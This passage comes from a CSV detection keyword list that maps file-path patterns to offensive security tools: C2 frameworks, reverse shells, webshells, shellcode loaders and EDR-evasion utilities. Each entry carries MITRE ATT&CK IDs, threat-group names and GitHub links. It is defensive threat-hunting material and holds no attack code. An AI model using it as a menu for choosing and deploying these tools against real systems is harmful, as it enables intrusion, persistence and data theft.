Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*/SharpGmailC2.git*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*/SharpHandler.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - 
T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/SharpHide.git*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*/SharpLDAP.git*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*/SharpNoPSExec*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*/SharpRDP.git*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*/SharpRDPHijack*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*/SharpShares/Enums*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*/SharpShellPipe.git*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*/SharpSocks*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*/SharpSploit*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/SharpSploit/*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*/SharpSpoolTrigger*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*/SharpSpray.exe*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red 
teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*/SharpStay.git*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*/SharpStay/*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*/SharpSword.git*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*/SharpSword/SharpSword*,offensive_tool_keyword,cobaltstrike,Read the contents of DOCX files using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,10,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*/SharpSystemTriggers*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*/SharpTerminator/*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*/SharpUnhooker.git*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*/SharpView.git*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*/SharpWSUS*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,1,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*/SharPyShell*,offensive_tool_keyword,SharPyShell,SharPyShell - 
tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*/shell/password.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/shell/shell_port.*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*/shell_exec.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/Shell3er/*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,1,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*/shellcode*loader.bin*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/shellcode.bin*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*/shellcode.bin.*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 
- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/shellcode.hex*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*/shellcode.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/shellcode_excel*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/ShellCode_Loader*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,1,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*/shellcode_samples/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/shellcode_sources/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/ShellcodeFluctuation*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*/Shellcode-Hide.git*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/SHELLCODELOADER*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - 
T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/Shellcode-Loader.git*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,1,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*/shellcodes/utils.py*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/shellcodetester*,offensive_tool_keyword,shellcodetester,This tools test generated ShellCodes,T1059.003 - T1059.005 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/helviojunior/shellcodetester,1,1,N/A,N/A,1,78,28,2023-04-24T22:34:25Z,2019-06-11T04:39:58Z -*/ShellGhost.git*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*/shellinject*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/ShellPop*,offensive_tool_keyword,ShellPop,Shellpop is all about popping shells. 
With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.,T1059 - T1574 - T1055 - T1021,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/0x00-0x00/ShellPop,1,0,N/A,N/A,10,1393,237,2019-04-02T14:53:19Z,2018-03-08T03:58:00Z -*/Shells/shell.aspx*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.jsp*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.php*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.py*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/shell.sh*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/tomcat.war*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/Shells/wordpress.zip*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/shellshock.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/sherlocksecurity/*,offensive_tool_keyword,POC,POC and exploit tools on github,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/sherlocksecurity,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Shhmon/*,offensive_tool_keyword,shhmon,Neutering Sysmon via driver unload,T1518.001 ,TA0007,N/A,N/A,Defense Evasion,https://github.com/matterpreter/Shhmon,1,1,N/A,N/A,3,210,35,2022-10-13T16:56:41Z,2019-09-12T14:13:19Z -*/ShimsInstaller.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/shocknawe/*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential 